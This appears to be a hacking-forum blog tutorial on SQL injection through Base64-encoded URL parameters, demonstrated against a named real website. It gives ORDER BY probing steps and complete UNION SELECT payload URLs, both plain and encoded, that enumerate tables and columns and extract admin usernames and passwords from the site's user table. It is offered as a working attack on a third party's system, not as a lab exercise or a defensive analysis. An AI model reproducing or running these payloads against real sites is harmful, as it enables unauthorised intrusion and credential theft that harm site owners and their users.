Hello proleets i hope you are fine today i gonna teach you how we can inject website using Base64 Encode Quries so lets start
I have already Base64 injection website
=> http://aimschennai.in/viewpost.php?id=6
Ok how we know that this website base 64 yes or no when we try to find order simple using order by we if we got error its mean this website maybe base 64 Like this
=> you can see this when i used order by statement we i got sqli errors
=> Now select vuln id or order by statement
=> 6 order by 1 (Encoding) No error
Click Base64 Encode and Execute
when we encode this you can see this we don't got any error
Now use this method find orders
=> 6 order by 2 (Encoding) No error
=> 6 order by 3 (Encoding) No error
=> 6 order by 4 (Encoding) No error
=> 6 order by 10 (Encoding) Error See scren short
=> we got 8 orders so now use union select statement or Ecode this
Click Base64 Encode then execute this website
you can see this we got table number now simply use table quries or encode this query
Simple :- http://aimschennai.in/viewpost.php?id=6 UNION ALL SELECT 1,2,group_concat(table_name),4,5,6,7,8 from information_schema.tables where table_Schema=database()--+-
Encode :-
http://aimschennai.in/viewpost.php?id=NiAgVU5JT04gQUxMIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpLDQsNSw2LDcsOCBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfU2NoZW1hPWRhdGFiYXNlKCktLSAt
got table data copy aims_user or find columns simply sqli quries
Decode Quries or find table data
Simple : http://aimschennai.in/viewpost.php?id=6 UNION ALL SELECT 1,2,group_concat(column_name),4,5,6,7,8 from information_schema.columns where table_name=CHAR(97, 105, 109, 115, 95, 117, 115, 101, 114)-- -
Encode : http://aimschennai.in/viewpost.php?id=NiAgVU5JT04gQUxMIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSw0LDUsNiw3LDggZnJvbSBpbmZvcm1hdGlvbl9zY2hlbWEuY29sdW1ucyB3aGVyZSB0YWJsZV9uYW1lPUNIQVIoOTcsIDEwNSwgMTA5LCAxMTUsIDk1LCAxMTcsIDExNSwgMTAxLCAxMTQpLS0gLQ==
Got all coulmns now we need admin user or password use simple sli quries or Encode this
Simple :http://aimschennai.in/viewpost.php?id=6 UNION ALL SELECT 1,2,group_concat(am_username,0x3a,am_password),4,5,6,7,8 from aims_user
Encode : http://aimschennai.in/viewpost.php?id=NiAgVU5JT04gQUxMIFNFTEVDVCAxLDIsZ3JvdXBfY29uY2F0KGFtX3VzZXJuYW1lLDB4M2EsYW1fcGFzc3dvcmQpLDQsNSw2LDcsOCBmcm9tIGFpbXNfdXNlcg==
Finally we got admin users or password
=> I hope you like this tutorials wattling your comments if you need help about this tutorial Pm me i will help you :)
Join fb : Facebook.com/ProLeEtS
0 comments:
Post a Comment